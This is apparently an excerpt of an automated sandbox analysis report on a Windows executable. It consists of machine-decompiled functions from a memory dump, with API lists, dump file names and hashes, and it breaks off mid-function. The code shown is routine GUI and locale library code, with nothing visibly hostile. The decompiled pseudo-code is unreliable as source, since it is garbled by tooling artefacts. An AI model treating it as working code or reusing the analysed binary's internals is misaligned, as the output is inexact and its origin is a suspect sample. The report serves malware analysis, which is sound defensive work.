0x00000000 0x00000000 0x00000000 0x00401b9d 0x00401b9d 0x00401b9f 0x00401ba1 0x00401c04 0x00401c04 0x00401c09 0x00401c0d 0x00000000 0x00000000 0x00401c13 0x00401c18 0x00401c19 0x00401c1a 0x00401c1f 0x00401c23 0x00401c2d 0x00401c32 0x00401c33 0x00000000 0x00401c33 0x00000000 0x00401c23 0x00401c04 0x00401ba3 0x00401ba3 0x00401ba3 0x00401ba3 0x00401ba7 0x00401baa 0x00401bd8 0x00401bda 0x00401bef 0x00401bef 0x00401bdc 0x00401bdc 0x00401bdf 0x00401be2 0x00401be5 0x00401be8 0x00401bea 0x00401bed 0x00000000 0x00000000 0x00401bed 0x00401bf2 0x00401bf4 0x00401bf6 0x00401bf9 0x00401c71 0x00401c74 0x00401c76 0x00401c78 0x00401c79 0x00401c7b 0x00401c38 0x00401c38 0x00401c3d 0x00401c45 0x00000000 0x00000000 0x00401c49 0x00401c4e 0x00401c53 0x00401c5b 0x00401c5f 0x00000000 0x00401c5f 0x00000000 0x00401c5b 0x00401c38 0x00401c7d 0x00401c7d 0x00401c85 0x00401c89 0x00401cc0 0x00401cc3 0x00401cc6 0x00401cc8 0x00401cce 0x00401cd0 0x00401cd0 0x00401c8b 0x00401c8b 0x00401c8b 0x00401c8e 0x00401c8e 0x00401c92 0x00401c96 0x00401cd8 0x00401cdb 0x00401cdd 0x00401cdf 0x00401ce5 0x00401ce9 0x00401ce9 0x00401ce5 0x00401c98 0x00401c9e 0x00401cf0 0x00401cfa 0x00401d28 0x00401d2e 0x00401d33 0x00401d3a 0x00401d44 0x00401d4a 0x00401d51 0x00401d55 0x00401cfc 0x00401cfc 0x00401cff 0x00401d01 0x00401d04 0x00401d07 0x00401d09 0x00401d18 0x00401d1d 0x00401d20 0x00401d24 0x00401d24 0x00401ca0 0x00401ca3 0x00401ca6 0x00401cae 0x00401cb3 0x00401cba 0x00401cbe 0x00401cbe 0x00401bac 0x00401bac 0x00401bae 0x00401bb4 0x00401bb7 0x00401bc0 0x00401bc3 0x00401bc6 0x00401bc9 0x00401bcc 0x00401bcf 0x00401bd2 0x00401bd2 0x00401bd4 0x00401bd5 0x00401bb9 0x00401bb9 0x00401bb9 0x00401bbb 0x00401bbd 0x00401bbe 0x00401bbe 0x00401bb7 0x00401baa

APIs

Sleep.KERNEL32(00000000,?,?,00000000,004020E0), ref: 00401C13 Sleep.KERNEL32(0000000A,00000000,?,?,00000000,004020E0), ref: 00401C2D

Memory Dump Source

Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp Download File Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp Download File Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp Download File Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: Sleep String ID: API String ID: 3472027048-0 Opcode ID: 1e7206aa02f44caa39bbd2ffb76f0b3617e92c3f79faf1de15c14edde19f57f3 Instruction ID: 15b0095f43085506295c4366a214112c8c682c56cb7411fb19f3a5050c217c1f Opcode Fuzzy Hash: 1e7206aa02f44caa39bbd2ffb76f0b3617e92c3f79faf1de15c14edde19f57f3 Instruction Fuzzy Hash: E151F3B12043809FE715CF28C984716BBD0AF45315F2881BFE444AB3E2E7B8D945C79A

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 87%

E004303E4(void* __eax, void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, int _a4, char _a8, struct tagRECT* _a12) { int _v8; intOrPtr _v12; intOrPtr _v16; struct tagRECT _v32; void* _t53; CHAR* _t63; void* _t74; void* _t76; CHAR* _t87; int _t113; intOrPtr _t123; void* _t135; int _t136; int _t137; int _t139; int* _t140; void* _t144; char _t153; _t116 = __ecx; _t143 = _t144; _v8 = 0; _v16 = __ecx; _v12 = __edx; _t135 = __eax; _t113 = _a4; _push(_t144); _push(0x4305d0); _push( *[fs:eax]); *[fs:eax] = _t144 + 0xffffffe4; _t53 = E00432460(__eax); _t131 = _t53; if(_t53 != 0 && E00433CE0(_t131) != 0) { if((_t113 & 0x00000000) != 0) { __eflags = (_t113 & 0x00000002) - 2; if((_t113 & 0x00000002) == 2) { _t113 = _t113 & 0xfffffffd; __eflags = _t113; } } else { _t113 = _t113 & 0xffffffff | 0x00000002; } _t113 = _t113 | 0x00020000; } E004047D4( &_v8, _v16); if((_t113 & 0x00000004) == 0) { L12: E00404B4C(_v8, 0x4305f4); if(_t153 != 0) { E004262A4( *((intOrPtr*)(_v12 + 0x14)), _t116, 1, _t131, _t143, __eflags); __eflags = *((char*)(_t135 + 0x3a)); if( *((char*)(_t135 + 0x3a)) != 0) { _t132 = *((intOrPtr*)(_v12 + 0xc)); __eflags = E00425C4C( *((intOrPtr*)(_v12 + 0xc))) | *0x4305f8; E00425C58( *((intOrPtr*)(_v12 + 0xc)), E00425C4C( *((intOrPtr*)(_v12 + 0xc))) | *0x4305f8, _t132, _t135, _t143); } __eflags = *((char*)(_t135 + 0x39)); if( *((char*)(_t135 + 0x39)) != 0) { L26: _t136 = _v8; __eflags = _t136; if(_t136 != 0) { _t137 = _t136 - 4; __eflags = _t137; _t136 = *_t137; } _t63 = E00404C00(_v8); DrawTextA(E0042681C(_v12), _t63, _t136, _a12, _t113); L29: _pop(_t123); *[fs:eax] = _t123; _push(0x4305d7); return E0040473C( &_v8); } else { __eflags = _a8; if(_a8 == 0) { OffsetRect(_a12, 1, 1); E004258CC( *((intOrPtr*)(_v12 + 0xc)), 0xff000014); _t139 = _v8; __eflags = _t139; if(_t139 != 0) { _t140 = _t139 - 4; __eflags = _t140; _t139 = *_t140; } _t87 = E00404C00(_v8); DrawTextA(E0042681C(_v12), _t87, _t139, _a12, _t113); OffsetRect(_a12, 0xffffffff, 0xffffffff); } __eflags = _a8; if(_a8 == 0) { L25: E004258CC( *((intOrPtr*)(_v12 + 0xc)), 0xff000010); } else { _t74 = E00425400(0xff00000d); _t76 = E00425400(0xff000010); __eflags = _t74 - _t76; if(_t74 != _t76) { goto L25; } E004258CC( *((intOrPtr*)(_v12 + 0xc)), 0xff000014); } goto L26; } } if((_t113 & 0x00000004) == 0) { asm("movsd"); asm("movsd"); asm("movsd"); asm("movsd"); _v32.top = _v32.top + 4; DrawEdge(E0042681C(_v12), &_v32, 6, "true"); } goto L29; } else { if(_v8 == 0) { L11: E00404A08( &_v8, 0x4305e8); goto L12; } if( *_v8 != 0x26) { goto L12; } _t153 = *((char*)(_v8 + 1)); if(_t153 != 0) { goto L12; } goto L11; } } 0x004303e4 0x004303e5 0x004303ef 0x004303f2 0x004303f5 0x004303f8 0x004303fa 0x004303ff 0x00430400 0x00430405 0x00430408 0x0043040d 0x00430412 0x00430416 0x00430426 0x00430435 0x00430438 0x0043043d 0x0043043d 0x0043043d 0x00430428 0x0043042b 0x0043042b 0x00430440 0x00430440 0x0043044c 0x00430454 0x0043047a 0x00430482 0x00430487 0x004304c5 0x004304ca 0x004304ce 0x004304d3 0x004304df 0x004304e7 0x004304e7 0x004304ec 0x004304f0 0x00430591 0x00430591 0x00430594 0x00430596 0x00430598 0x00430598 0x0043059b 0x0043059b 0x004305a6 0x004305b5 0x004305ba 0x004305bc 0x004305bf 0x004305c2 0x004305cf 0x004304f6 0x004304f6 0x004304fa 0x00430504 0x00430514 0x00430519 0x0043051c 0x0043051e 0x00430520 0x00430520 0x00430523 0x00430523 0x0043052e 0x0043053d 0x0043054a 0x0043054a 0x0043054f 0x00430553 0x00430581 0x0043058c 0x00430555 0x0043055a 0x00430566 0x0043056b 0x0043056d 0x00000000 0x00000000 0x0043057a 0x0043057a 0x00000000 0x00430553 0x004304f0 0x0043048c 0x0043049a 0x0043049b 0x0043049c 0x0043049d 0x0043049e 0x004304b3 0x004304b3 0x00000000 0x00430456 0x0043045a 0x0043046d 0x00430475 0x00000000 0x00430475 0x00430462 0x00000000 0x00000000 0x00430467 0x0043046b 0x00000000 0x00000000 0x00000000 0x0043046b

APIs

DrawEdge.USER32(00000000,?,00000006,?), ref: 004304B3 OffsetRect.USER32(?,00000001,00000001), ref: 00430504 DrawTextA.USER32(00000000,00000000,?,?,?), ref: 0043053D OffsetRect.USER32(?,000000FF,000000FF), ref: 0043054A DrawTextA.USER32(00000000,00000000,?,?,?), ref: 004305B5

Memory Dump Source

Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp Download File Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp Download File Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp Download File Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: Draw$OffsetRectText$Edge String ID: API String ID: 3610532707-0 Opcode ID: a5c1db12bf0ac30249b93611e375069da9dd1bc870eb88bb1d58e4da80817d54 Instruction ID: 3dcdb83b52eea41a6f7c2ae4f71efb06fc793ff540cda049268810552e419287 Opcode Fuzzy Hash: a5c1db12bf0ac30249b93611e375069da9dd1bc870eb88bb1d58e4da80817d54 Instruction Fuzzy Hash: E451B770A00214AFDB10EB69C891B9FB7A5AF08324F55526BF914A7392C77CEE408B59

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%

E00430224(int __eax, void* __edx) { signed int _t39; signed int _t40; intOrPtr _t44; int _t46; int _t47; intOrPtr* _t48; _t18 = __eax; _t48 = __eax; if(( *(__eax + 0x1c) & 0x00000008) == 0) { if(( *(__eax + 0x1c) & 0x00000002) != 0) { *((char*)(__eax + 0x74)) = 1; return __eax; } _t19 = *((intOrPtr*)(__eax + 0x6c)); if( *((intOrPtr*)(__eax + 0x6c)) != 0) { return E00430224(_t19, __edx); } _t18 = GetMenuItemCount(E00430354(__eax)); _t47 = _t18; _t40 = _t39 & 0xffffff00 | _t47 == 0x00000000; while(_t47 > 0) { _t46 = _t47 - 1; _t18 = GetMenuState(E00430354(_t48), _t46, 0x400); if((_t18 & 0x00000004) == 0) { _t18 = RemoveMenu(E00430354(_t48), _t46, 0x400); _t40 = 1; } _t47 = _t47 - 1; } if(_t40 != 0) { if( *((intOrPtr*)(_t48 + 0x64)) != 0) { L14: E004300E4(_t48); L15: return *((intOrPtr*)( *_t48 + 0x3c))(); } _t44 = *0x42eccc; // 0x42ed18 if(E00403AB4( *((intOrPtr*)(_t48 + 0x70)), _t44) == 0 || GetMenuItemCount(E00430354(_t48)) != 0) { goto L14; } else { DestroyMenu( *(_t48 + 0x34)); *(_t48 + 0x34) = 0; goto L15; } } } return _t18; } 0x00430224 0x00430228 0x0043022e 0x00430238 0x0043023a 0x00000000 0x0043023a 0x00430243 0x00430248 0x00000000 0x0043024a 0x0043025c 0x00430261 0x00430265 0x0043026a 0x00430273 0x0043027d 0x00430284 0x00430294 0x00430299 0x00430299 0x0043029b 0x0043029c 0x004302a2 0x004302a8 0x004302dd 0x004302df 0x004302e4 0x00000000 0x004302ea 0x004302ad 0x004302ba 0x00000000 0x004302cd 0x004302d1 0x004302d8 0x00000000 0x004302d8 0x004302ba 0x004302a2 0x004302f1

Memory Dump Source

Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp Download File Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp Download File Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp Download File Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: String ID: API String ID: Opcode ID: 6868910fa89a8018b263f99a25884595e32ff1315658f09768cdbd9cf83d8de8 Instruction ID: a3695b4b82a7dda22394f8c72c2d1be36efbcd0d540cfdc55166254eebed839c Opcode Fuzzy Hash: 6868910fa89a8018b263f99a25884595e32ff1315658f09768cdbd9cf83d8de8 Instruction Fuzzy Hash: E511A521B002495ADB20AA7B8929B5B27885F4970CF0422ABBD11A7393CA3CCC09C75C

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%

E004297F8(int __eax) { int _t21; signed int _t29; char _t34; int _t42; int _t43; struct HDC__* _t44; intOrPtr _t45; _t21 = __eax; _t42 = __eax; _t45 = *((intOrPtr*)(__eax + 0x28)); if( *((char*)(__eax + 0x30)) == 0 && *(_t45 + 0x10) == 0 && *((intOrPtr*)(_t45 + 0x14)) != 0) { _t22 = *((intOrPtr*)(_t45 + 0x14)); if( *((intOrPtr*)(_t45 + 0x14)) == *((intOrPtr*)(_t45 + 8))) { E0042824C(_t22); } _t21 = E0042730C( *((intOrPtr*)(_t45 + 0x14)), 1 << ( *(_t45 + 0x3e) & 0x0000ffff)); _t43 = _t21; *(_t45 + 0x10) = _t43; if(_t43 == 0) { _t44 = E00426C14(GetDC(0)); if( *((char*)(_t45 + 0x71)) != 0) { L9: _t34 = 1; } else { _t29 = GetDeviceCaps(_t44, 0xc); if(_t29 * GetDeviceCaps(_t44, 0xe) < ( *(_t45 + 0x2a) & 0x0000ffff) * ( *(_t45 + 0x28) & 0x0000ffff)) { goto L9; } else { _t34 = 0; } } *((char*)(_t45 + 0x71)) = _t34; if(_t34 != 0) { *(_t45 + 0x10) = CreateHalftonePalette(_t44); } _t21 = ReleaseDC(0, _t44); if( *(_t45 + 0x10) == 0) { *((char*)(_t42 + 0x30)) = 1; return _t21; } } } return _t21; } 0x004297f8 0x004297fc 0x004297fe 0x00429805 0x0042981f 0x00429825 0x00429827 0x00429827 0x0042983e 0x00429843 0x00429845 0x0042984a 0x00429858 0x0042985e 0x00429887 0x00429887 0x00429860 0x00429863 0x00429881 0x00000000 0x00429883 0x00429883 0x00429883 0x00429881 0x00429889 0x0042988e 0x00429896 0x00429896 0x0042989c 0x004298a5 0x004298a7 0x00000000 0x004298a7 0x004298a5 0x0042984a 0x004298af

APIs

GetDC.USER32(00000000), ref: 0042984E GetDeviceCaps.GDI32(00000000,0000000C), ref: 00429863 GetDeviceCaps.GDI32(00000000,0000000E), ref: 0042986D CreateHalftonePalette.GDI32(00000000,00000000,?,?,?,?,00428423,00000000,004284AF), ref: 00429891 ReleaseDC.USER32 ref: 0042989C

Memory Dump Source

Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp Download File Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp Download File Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp Download File Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: CapsDevice$CreateHalftonePaletteRelease String ID: API String ID: 2404249990-0 Opcode ID: 3865229444c542543eb940fc4c11deb8b2b846e1a53becbdafc0675224900ef4 Instruction ID: ad4f96e05be2536000db3a933fed08fd47ceb8b130526fe63b94d72f1acf08c5 Opcode Fuzzy Hash: 3865229444c542543eb940fc4c11deb8b2b846e1a53becbdafc0675224900ef4 Instruction Fuzzy Hash: DD11B4217152B99AEB24FF25A8817EE36D0AF42355F48012BFC406B2C1D7B98C94C2B9

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 88%

E00453CD8(void* __eax) { void* _t16; void* _t38; signed int _t40; _t16 = __eax; _t38 = __eax; if(( *(__eax + 0x1c) & 0x00000010) == 0 && *0x4626bc != 0) { _t16 = E004426F4(__eax); if(_t16 != 0) { _t40 = GetWindowLongA(E004423F8(_t38), 0xffffffec); if( *(_t38 + 0x328) != 0 || *(_t38 + 0x350) != 0) { if((_t40 & 0x00080000) == 0) { SetWindowLongA(E004423F8(_t38), 0xffffffec, _t40 | 0x00080000); } return *0x4626bc(E004423F8(_t38), *((intOrPtr*)(_t38 + 0x354)), *(_t38 + 0x329) & 0x000000ff, *(0x46274c + ( *(_t38 + 0x328) & 0x000000ff) * 4) | *(0x462754 + ( *(_t38 + 0x350) & 0x000000ff) * 4)); } else { SetWindowLongA(E004423F8(_t38), 0xffffffec, _t40 & 0xfff7ffff); return RedrawWindow(E004423F8(_t38), 0, 0, 0x485); } } } return _t16; } 0x00453cd8 0x00453cda 0x00453ce0 0x00453cf5 0x00453cfc 0x00453d11 0x00453d1a 0x00453d2b 0x00453d3e 0x00453d3e 0x00000000 0x00453d7f 0x00453d90 0x00000000 0x00453da6 0x00453d1a 0x00453cfc 0x00453dad

APIs

GetWindowLongA.USER32 ref: 00453D0C SetWindowLongA.USER32(00000000,000000EC,00000000), ref: 00453D3E SetLayeredWindowAttributes.USER32(00000000,?,?,00000000,00000000,000000EC,?,?,0045143C), ref: 00453D77 SetWindowLongA.USER32(00000000,000000EC,00000000), ref: 00453D90 RedrawWindow.USER32(00000000,00000000,00000000,00000485,00000000,000000EC,00000000,00000000,000000EC,?,?,0045143C), ref: 00453DA6

Memory Dump Source

Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp Download File Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp Download File Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp Download File Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Long$AttributesLayeredRedraw String ID: API String ID: 1758778077-0 Opcode ID: a167b8226a367de4a078897bccef434779ea8f70462ce2f86b559be6c3f23891 Instruction ID: 2f97fc831ddea0b8c0e421ebb8e19b8b50e61007e8c28567c32a4e0cf3139f72 Opcode Fuzzy Hash: a167b8226a367de4a078897bccef434779ea8f70462ce2f86b559be6c3f23891 Instruction Fuzzy Hash: 06110160A047902BDB11AF794D85F5626BC1B0536BF0805BABC55EA2C3CAACCA0CC768

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 70%

E00427274(void* __eax) { signed int _v5; struct HDC__* _v12; struct HPALETTE__* _t21; struct HPALETTE__* _t25; void* _t28; intOrPtr _t35; void* _t37; void* _t39; intOrPtr _t40; _t37 = _t39; _t40 = _t39 + 0xfffffff8; _t28 = __eax; _v5 = 0; if( *0x46634c == 0) { return _v5 & 0x000000ff; } else { _v12 = GetDC(0); _push(_t37); _push(0x4272fa); _push( *[fs:edx]); *[fs:edx] = _t40; if(GetDeviceCaps(_v12, 0x68) >= 0x10) { _t21 = *0x46634c; // 0x7a080b2a GetPaletteEntries(_t21, 0, 8, _t28 + 4); _t25 = *0x46634c; // 0x7a080b2a GetPaletteEntries(_t25, 8, 8, _t28 + ( *(_t28 + 2) & 0x0000ffff) * 4 - 0x1c); _v5 = 1; } _pop(_t35); *[fs:eax] = _t35; _push(0x427301); return ReleaseDC(0, _v12); } } 0x00427275 0x00427277 0x0042727b 0x0042727d 0x00427288 0x00427309 0x0042728a 0x00427291 0x00427296 0x00427297 0x0042729c 0x0042729f 0x004272b0 0x004272ba 0x004272c0 0x004272d2 0x004272d8 0x004272dd 0x004272dd 0x004272e3 0x004272e6 0x004272e9 0x004272f9 0x004272f9

APIs

GetDC.USER32(00000000), ref: 0042728C GetDeviceCaps.GDI32(?,00000068), ref: 004272A8 GetPaletteEntries.GDI32(7A080B2A,00000000,00000008,?), ref: 004272C0 GetPaletteEntries.GDI32(7A080B2A,00000008,00000008,?), ref: 004272D8 ReleaseDC.USER32 ref: 004272F4

Memory Dump Source

Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp Download File Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp Download File Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp Download File Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: EntriesPalette$CapsDeviceRelease String ID: API String ID: 3128150645-0 Opcode ID: ac1bfe70cc136cd0b1c148b7d32caf684ac8a85d6e8810b4e931f31978cb02c9 Instruction ID: fcbf177f7b8efaa1d200cff961121ff1be4b86295971eaf25a38603dbf7197bd Opcode Fuzzy Hash: ac1bfe70cc136cd0b1c148b7d32caf684ac8a85d6e8810b4e931f31978cb02c9 Instruction Fuzzy Hash: C1112B3164C304BEFB04DBE59C42F6D77E8E705704F41C0AAFA44EA2C1DABA9444C729

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 64%

E0040BBE0(void* __esi, void* __eflags) { char _v8; intOrPtr* _t18; intOrPtr _t26; void* _t27; long _t29; intOrPtr _t32; void* _t33; _t33 = __eflags; _push(0); _push(_t32); _push(0x40bc77); _push( *[fs:eax]); *[fs:eax] = _t32; E0040B954(GetThreadLocale(), 0x40bc8c, 0x100b, &_v8); _t29 = E00408B44(0x40bc8c, 1, _t33); if(_t29 + 0xfffffffd - 3 < 0) { EnumCalendarInfoA(E0040BB2C, GetThreadLocale(), _t29, 4); _t27 = 7; _t18 = 0x4658f4; do { *_t18 = 0xffffffff; _t18 = _t18 + 4; _t27 = _t27 - 1; } while (_t27 != 0); EnumCalendarInfoA(E0040BB68, GetThreadLocale(), _t29, 3); } _pop(_t26); *[fs:eax] = _t26; _push(E0040BC7E); return E0040473C( &_v8); } 0x0040bbe0 0x0040bbe3 0x0040bbe8 0x0040bbe9 0x0040bbee 0x0040bbf1 0x0040bc07 0x0040bc19 0x0040bc23 0x0040bc33 0x0040bc38 0x0040bc3d 0x0040bc42 0x0040bc42 0x0040bc48 0x0040bc4b 0x0040bc4b 0x0040bc5c 0x0040bc5c 0x0040bc63 0x0040bc66 0x0040bc69 0x0040bc76

APIs

GetThreadLocale.KERNEL32(?,00000000,0040BC77,?,?,00000000), ref: 0040BBF8 Part of subcall function 0040B954: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0040B972 GetThreadLocale.KERNEL32(00000000,00000004,00000000,0040BC77,?,?,00000000), ref: 0040BC28 EnumCalendarInfoA.KERNEL32(Function_0000BB2C,00000000,00000000,00000004), ref: 0040BC33 GetThreadLocale.KERNEL32(00000000,00000003,00000000,0040BC77,?,?,00000000), ref: 0040BC51 EnumCalendarInfoA.KERNEL32(Function_0000BB68,00000000,00000000,00000003), ref: 0040BC5C

Memory Dump Source

Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp Download File Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp Download File Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp Download File Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: Locale$InfoThread$CalendarEnum String ID: API String ID: 4102113445-0 Opcode ID: 97d354d8b6cdc2396397ecc49eed239671b501c3797063cbf2a75c35dab51ed0 Instruction ID: 22d4ad3a48fad1cbf9e27e67077bea737ce6d0b3631ad7d1c133fb8823499fa8 Opcode Fuzzy Hash: 97d354d8b6cdc2396397ecc49eed239671b501c3797063cbf2a75c35dab51ed0 Instruction Fuzzy Hash: 7E012F717442446BE601B7758D03F2A366CDB86718F61403BB900FA6C9DB3CAE1086AC

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%

E00455410() { void* _t2; void* _t5; void* _t8; struct HHOOK__* _t10; if( *0x466598 != 0) { _t10 = *0x466598; // 0x0 UnhookWindowsHookEx(_t10); } *0x466598 = 0; if( *0x46659c != 0) { _t2 = *0x466594; // 0x0 SetEvent(_t2); if(GetCurrentThreadId() != *0x466590) { _t8 = *0x46659c; // 0x0 WaitForSingleObject(_t8, 0xffffffff); } _t5 = *0x46659c; // 0x0 CloseHandle(_t5); *0x46659c = 0; return 0; } return 0; } 0x00455417 0x00455419 0x0045541f 0x0045541f 0x00455426 0x00455432 0x00455434 0x0045543a 0x0045544a 0x0045544e 0x00455454 0x00455454 0x00455459 0x0045545f 0x00455466 0x00000000 0x00455466 0x0045546b

APIs

UnhookWindowsHookEx.USER32(00000000), ref: 0045541F SetEvent.KERNEL32(00000000,00457DAE,00000000,00456B7B,?,?,00460C02,00000001,00456D41,?,00000000,00000000,00000000,00000001), ref: 0045543A GetCurrentThreadId.KERNEL32 ref: 0045543F WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,00457DAE,00000000,00456B7B,?,?,00460C02,00000001,00456D41,?,00000000,00000000,00000000,00000001), ref: 00455454 CloseHandle.KERNEL32(00000000,00000000,00457DAE,00000000,00456B7B,?,?,00460C02,00000001,00456D41,?,00000000,00000000,00000000,00000001), ref: 0045545F

Memory Dump Source

Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp Download File Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp Download File Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp Download File Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseCurrentEventHandleHookObjectSingleThreadUnhookWaitWindows String ID: API String ID: 2429646606-0 Opcode ID: 8d4b083acdc61fb605ee7809ee2f04c3fef8837cea9ec92acbb126d3f3c8ffb3 Instruction ID: c8276ee7c81c26c9bfae65dd25605525a1fe353da67a80127bb571263e38ba24 Opcode Fuzzy Hash: 8d4b083acdc61fb605ee7809ee2f04c3fef8837cea9ec92acbb126d3f3c8ffb3 Instruction Fuzzy Hash: 50F0F870510580BACA10EF69BC47B1532E4A70D316B124A3AF00AD71EBE7B9B484CF1E

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 84%

E00458030(char __eax, void* __ebx, void* __edx, void* __edi, void* __esi) { char _v8; intOrPtr _v12; char _v16; intOrPtr _v20; struct HWND__* _v24; intOrPtr _v28; char _v32; struct tagRECT _v48; intOrPtr _v52; intOrPtr _v56; int _v60; int _v64; intOrPtr _v68; char _v72; int _v76; char _v80; intOrPtr _v84; intOrPtr _v88; struct tagPOINT _v96; char _v97; struct tagRECT _v113; char _v132; intOrPtr _v136; char _v140; char _v144; char _v148; struct HWND__* _t131; void* _t145; struct HWND__* _t167; intOrPtr _t188; char _t194; intOrPtr _t218; intOrPtr _t222; void* _t238; intOrPtr* _t250; intOrPtr _t269; intOrPtr _t271; intOrPtr _t276; struct tagRECT* _t298; intOrPtr* _t302; intOrPtr _t303; void* _t310; _t309 = _t310; _push(__ebx); _push(__esi); _push(__edi); _t251 = 0; _v144 = 0; _v148 = 0; asm("movsd"); asm("movsd"); _v8 = __eax; _t268 = *0x44c7e8; // 0x44c7ec E004051D8( &_v72, _t268); _t250 = &_v8; _push(_t310); _push(0x4583b7); _push( *[fs:eax]); *[fs:eax] = _t310 + 0xffffff70; *((char*)( *_t250 + 0x58)) = 0; _v24 = 0; if( *((char*)( *_t250 + 0x88)) == 0 || *((intOrPtr*)( *_t250 + 0x60)) == 0 || E0044CBE4() == 0) { L23: _t131 = _v24; __eflags = _t131; if(_t131 <= 0) { E00457D90( *_t250, _t251, _t268); } else { E00457B58( *_t250, 0, _t131); } goto L26; } else { _t145 = E00455288(E00438F94( &_v80, 1)); _t268 = *_t250; if(_t145 != *((intOrPtr*)( *_t250 + 0x60))) { goto L23; } else { _v72 = *((intOrPtr*)( *_t250 + 0x60)); _v64 = _v80; _v60 = _v76; _v60 = _v60 + E00457DC8(); _v56 = E00454604(); _v52 = *((intOrPtr*)( *_t250 + 0x5c)); E0043A33C( *((intOrPtr*)( *_t250 + 0x60)), &_v132); _t298 = &_v48; asm("movsd"); asm("movsd"); asm("movsd"); asm("movsd"); *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t250 + 0x60)))) + 0x40))(); _v96.x = 0; _v96.y = 0; _t302 = *((intOrPtr*)( *((intOrPtr*)( *_t250 + 0x60)) + 0x30)); _t316 = _t302; if(_t302 == 0) { _t303 = *((intOrPtr*)( *_t250 + 0x60)); _t276 = *0x4369e8; // 0x436a34 _t167 = E00403AB4(_t303, _t276); __eflags = _t167; if(_t167 != 0) { __eflags = *(_t303 + 0x1c4); if( *(_t303 + 0x1c4) != 0) { ClientToScreen( *(_t303 + 0x1c4), &_v96); } } } else { *((intOrPtr*)( *_t302 + 0x40))(); } OffsetRect( &_v48, _v96.x - _v88, _v96.y - _v84); E0043A55C( *((intOrPtr*)( *_t250 + 0x60)), &_v140, &_v80); _v32 = _v140; _v28 = _v136; E00455250( *((intOrPtr*)( *_t250 + 0x60)), &_v148); E004376EC(_v148, &_v140, &_v144, _t316); E004047D4( &_v16, _v144); _v20 = *((intOrPtr*)( *_t250 + 0x74)); _t188 = *0x4626b8; // 0x436fb0 _v68 = _t188; _v12 = 0; _t251 = 0; _v97 = E0043BC9C( *((intOrPtr*)( *_t250 + 0x60)), 0, 0xb030, &_v72) == 0; if(_v97 != 0 && *((short*)( *_t250 + 0x15a)) != 0) { _t251 = &_v97; *((intOrPtr*)( *_t250 + 0x158))( &_v72); } if(_v97 == 0 || *((intOrPtr*)( *_t250 + 0x60)) == 0) { _t194 = 0; } else { _t194 = 1; } _t268 = *_t250; *((char*)( *_t250 + 0x58)) = _t194; if( *((char*)( *_t250 + 0x58)) == 0) { goto L23; } else { _t323 = _v16; if(_v16 == 0) { goto L23; } E00457F20(_v68, _t268, _t309); *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t250 + 0x84)))) + 0x74))(); *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t250 